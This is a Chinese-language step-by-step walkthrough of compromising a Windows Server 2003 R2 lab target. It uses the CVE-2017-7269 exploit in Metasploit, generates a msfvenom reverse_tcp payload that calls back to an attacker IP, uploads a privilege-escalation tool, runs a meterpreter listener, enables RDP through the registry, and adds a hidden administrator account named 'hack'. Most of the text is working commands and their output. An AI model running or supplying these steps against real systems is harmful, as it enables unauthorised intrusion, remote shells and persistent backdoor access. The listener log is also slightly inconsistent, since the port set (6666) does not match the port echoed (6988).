提權文件下載:點此下載
靶機:Windows server 2003 r2
EXP:https://github.com/zcgonvh/cve-2017-7269
把EXP導入Metasploit
啓動MSF
嘗試加載攻擊模塊
發現找不到該模塊,這是因爲msf不識別-,把-改爲下劃線就好了
重新啓動程序
成功加載攻擊模塊
查看需要設置的參數
設置參數
加載攻擊載荷
開始攻擊
攻擊成功
生成payload
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.136 LPORT=6666 -f exe -o system.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
Saved as: system.exe
嘗試提權
測試得知根目錄具有寫權限
上傳提權文件
meterpreter > upload "/root/pr.exe" c:\\shell
[*] uploading : /root/pr.exe -> c:\shell
[*] uploaded : /root/pr.exe -> c:\shell\pr.exe
meterpreter > upload "/root/system.exe" c:\\shell
[*] uploading : /root/system.exe -> c:\shell
[*] uploaded : /root/system.exe -> c:\shell\system.exe
meterpreter >
開啓一個msfconsole並進入監聽狀態
sf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.52.136
lhost => 192.168.52.136
msf5 exploit(multi/handler) > set lport 6666
lport => 6988
msf5 exploit(multi/handler) > exploit
執行提權程序
成功獲取到一個shell
得到最高權限
使用以下命令開啓3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
關閉3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f
使用netstat -an查看是否開啓
添加管理員賬號
C:\shell>pr.exe "net user hack !123 /add"
pr.exe "net user hack !123 /add"
/xxoo/-->Build&&Change By p
/xxoo/-->This exploit gives you a Local System shell
/xxoo/-->Got WMI process Pid: 1796
begin to try
/xxoo/-->Found token SYSTEM
/xxoo/-->Command:net user hack !123 /add
添加到管理組
C:\shell>pr.exe "net localgroup administrators hack /add"
pr.exe "net localgroup administrators hack /add"
/xxoo/-->Build&&Change By p
/xxoo/-->This exploit gives you a Local System shell
/xxoo/-->Got WMI process Pid: 1796
begin to try
/xxoo/-->Found token SYSTEM
/xxoo/-->Command:net localgroup administrators hack /add
命令成功完成。
啓動遠程桌面連接